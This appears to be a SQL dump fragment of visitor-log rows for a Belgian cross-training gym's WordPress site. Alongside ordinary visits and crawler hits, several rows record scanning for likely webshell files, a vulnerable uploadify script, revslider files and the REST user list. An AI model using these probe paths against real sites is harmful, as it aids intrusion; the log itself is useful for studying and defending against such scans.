(70809, 1493211647.340934, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70810, 1493212707.071044, 1837486295, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(70811, 1493212732.771703, 1837486295, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(70812, 1493213234.539477, 1837486295, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(70813, 1493217031.450517, 2509959393, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70814, 1493220059.918000, 1837382274, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(70815, 1493220061.787690, 1837382274, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(70816, 1493221581.089734, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70817, 1493223338.545956, 3584051034, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70818, 1493224190.080225, 876167319, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(70819, 1493224192.596200, 876167319, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(70820, 1493229342.815006, 786801766, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(70821, 1493230808.692233, 2760119799, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(70822, 1493231182.510798, 1599420426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70823, 1493231182.908920, 1599420426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70824, 1493231577.796859, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70825, 1493231578.332896, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70826, 1493231578.803403, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70827, 1493231579.238783, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70828, 1493231579.710196, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70829, 1493231580.162822, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70830, 1493231580.691394, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70831, 1493231581.163627, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70832, 1493231581.608514, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70833, 1493231582.086034, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70834, 1493231582.539740, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70835, 1493232319.507096, 3641698364, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70836, 1493232374.263966, 3641698364, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70837, 1493232391.501539, 3641698364, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70838, 1493232436.903172, 3641698364, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(68604, 1490958855.746366, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68605, 1490961173.543326, 2637637524, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68606, 1490961555.970080, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/kup.php?u=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68607, 1490963804.126322, 2637637597, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68608, 1490963804.514771, 2637637597, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68609, 1490968473.090579, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68610, 1490968481.211231, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(68611, 1490975019.513387, 96262312, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', 'http://www.crosstrainingcenter.be/feed/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(68612, 1490976984.889856, 856637074, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(68613, 1490977479.783638, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68614, 1490977481.578224, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68615, 1490977483.304018, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68616, 1490977484.912682, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68617, 1490977486.737984, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68618, 1490977490.610268, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68619, 1490977492.164681, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68620, 1490977493.825744, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(68621, 1490979097.597664, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/Tobey.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68622, 1490979818.977700, 1592040092, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(68623, 1490979859.296789, 1592040092, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(68624, 1490979893.126803, 1592040092, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1'),
(68625, 1490994519.347604, 1123635120, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68626, 1490994519.925070, 1123635120, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68627, 1490994895.578956, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/cachee.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68628, 1490999323.131336, 1440149042, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(68629, 1491007050.331163, 2637637600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68630, 1491007050.332007, 2637637600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68631, 1491007309.579578, 3639891347, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php', 'http://crosstrainingcenter.be/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68632, 1491007676.783193, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68633, 1491010866.185558, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68634, 1491010868.416585, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-profi1e.php?x=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68635, 1491014462.381371, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68636, 1491015628.093805, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/wp-inc.php', 'http://www.crosstrainingcenter.be/wp-includes/wp-inc.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68637, 1491026699.871355, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-check.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68638, 1491032022.881465, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68639, 1491032023.430997, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68640, 1491035052.955966, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68641, 1491037832.531172, 1123634953, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68642, 1491037833.884988, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68643, 1491042937.564400, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php?x=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68644, 1491052746.881275, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/images/hon2our.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68645, 1491056213.193732, 1463833377, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68646, 1491056216.227396, 1463833377, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68647, 1491056254.231196, 1463833377, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(68648, 1491062197.810130, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/admin.css', 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/admin.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68649, 1491065177.881156, 3155096154, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68650, 1491065178.657093, 3155096154, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68651, 1491065179.389007, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68652, 1491065180.739977, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68653, 1491065181.439098, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68654, 1491065182.130026, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68655, 1491065183.509411, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68656, 1491065184.247709, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68657, 1491065184.984497, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68658, 1491065185.989155, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68659, 1491065186.827308, 3155096154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(68660, 1491069669.307308, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68661, 1491072796.092285, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68662, 1491074054.591836, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/1.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68663, 1491078112.277080, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68664, 1491082907.948368, 2731721826, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(68665, 1491082911.111717, 2731721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(68666, 1491082914.733974, 2731721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(68667, 1491086328.082747, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68668, 1491090180.820550, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68669, 1491092287.952174, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2016/01/new_up.php', 'http://www.crosstrainingcenter.be/wp-content/uploads/2016/01/new_up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68670, 1491092287.958396, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2016/02/new_up.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(68671, 1491099048.612482, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68672, 1491110083.091366, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68673, 1491111107.443325, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/xmlrpc-activate.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68674, 1491116768.132165, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68675, 1491117336.788087, 1355386976, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(68676, 1491125619.879671, 2637637440, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68677, 1491127513.698562, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/AKaWn7.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68678, 1491129557.999251, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68679, 1491129558.484386, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68680, 1491132714.536306, 2962952541, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.fr/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36'),
(68681, 1491132716.547848, 2962952541, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36'),
(68682, 1491135046.467038, 2637637440, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68683, 1491135046.892191, 2637637440, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68684, 1491139691.999527, 3475901924, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68685, 1491139692.001288, 3475901924, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68686, 1491139692.301379, 3475901924, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68687, 1491140453.465082, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68688, 1491141279.141732, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68689, 1491141279.142472, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68690, 1491141279.379366, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68691, 1491141898.342410, 84421910, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/users/', 'http://www.crosstrainingcenter.be/wp-json/wp/v2/users/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(68692, 1491142889.732733, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68693, 1491143972.157286, 2637637444, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
